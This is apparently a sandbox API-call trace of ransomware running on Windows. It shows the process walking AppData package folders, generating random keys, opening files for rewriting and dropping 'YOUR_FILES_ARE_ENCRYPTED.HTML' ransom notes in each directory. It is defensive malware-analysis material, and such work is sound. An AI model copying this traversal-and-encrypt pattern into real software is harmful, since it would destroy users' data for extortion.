lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore" [0115.774] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0115.774] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c03d9b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9d0eebc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9d0eebc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0115.775] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c03d9b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9d0eebc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9d0eebc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="..", cAlternateFileName="")) returned 1 [0115.775] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c03d9b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0xa3e9b04, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0xa3e9b04, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0115.775] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.775] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 184 [0115.775] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.775] lstrlenW (lpString=".dat") returned 4 [0115.775] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0115.775] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0115.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\microsoft.connectivitystore_1.1509.1.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0115.776] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=16384) returned 1 [0115.776] GetProcessHeap () returned 0x600000 [0115.776] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0115.778] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="2D") returned 2 [0115.778] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="7D") returned 2 [0115.778] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="B3") returned 2 [0115.778] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="95") returned 2 [0115.779] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="E1") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="69") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="CC") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="42") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="63") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="49") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="EE") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="5F") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="D4") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="71") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="E6") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="08") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="C0") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="14") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="44") returned 2 [0115.779] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="BE") returned 2 [0115.779] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="B9") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="EC") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="56") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="0A") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="8E") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="C8") returned 2 [0115.779] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="C7") returned 2 [0115.779] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="E3") returned 2 [0115.779] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="CC") returned 2 [0115.779] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="B8") returned 2 [0115.779] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="10") returned 2 [0115.779] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="6B") returned 2 [0115.780] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0115.780] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.780] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0115.780] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9d0eebc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9d0eebc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9d0eebc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0115.780] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.780] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 189 [0115.780] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.780] lstrlenW (lpString=".LOG1") returned 5 [0115.780] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0115.780] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9d0eebc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9d0eebc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9d0eebc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0115.780] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.780] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 189 [0115.780] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.780] lstrlenW (lpString=".LOG2") returned 5 [0115.780] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0115.780] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x9d0eebc, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9d0eebc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9d0eebc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x63d098, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0115.780] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0115.780] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 194 [0115.781] GetProcessHeap () returned 0x600000 [0115.781] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.781] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\microsoft.connectivitystore_1.1509.1.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.782] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.783] CloseHandle (hObject=0x214) returned 1 [0115.783] GetProcessHeap () returned 0x600000 [0115.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.784] GetProcessHeap () returned 0x600000 [0115.784] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.784] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9c03d9b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x9d0eebc, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x9d0eebc, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0115.784] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.784] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 178 [0115.784] GetProcessHeap () returned 0x600000 [0115.784] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Microsoft.ConnectivityStore_1.1509.1.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\microsoft.connectivitystore_1.1509.1.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.786] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.787] CloseHandle (hObject=0x32c) returned 1 [0115.787] GetProcessHeap () returned 0x600000 [0115.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.788] GetProcessHeap () returned 0x600000 [0115.788] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.789] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0115.789] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.789] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\RoamingState") returned 103 [0115.789] GetProcessHeap () returned 0x600000 [0115.789] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.790] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\RoamingState" [0115.790] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\RoamingState\\*" [0115.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0115.791] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0115.791] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8a6e8e8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x8a6e8e8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x8a6e8e8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0115.791] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.791] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 133 [0115.791] GetProcessHeap () returned 0x600000 [0115.791] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.791] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.connectivitystore_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.792] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.793] CloseHandle (hObject=0x32c) returned 1 [0115.793] GetProcessHeap () returned 0x600000 [0115.793] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.793] GetProcessHeap () returned 0x600000 [0115.793] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.794] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91bbc79, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x92a08d0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x93857b8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0115.794] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.794] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings") returned 99 [0115.794] GetProcessHeap () returned 0x600000 [0115.794] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.795] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings" [0115.795] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\*" [0115.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91bbc79, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x92a08d0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x93857b8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626778 [0115.795] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91bbc79, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x92a08d0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x93857b8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0115.795] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93857b8, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x93857b8, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x93857b8, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d146, dwReserved1=0x63d090, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0115.795] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.795] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.ConnectivityStore_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 112 [0115.795] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.795] lstrlenW (lpString=".lock") returned 5 [0115.795] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.795] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92a08d0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x92a08d0, ftLastAccessTime.dwHighDateTime=0x1d70074, 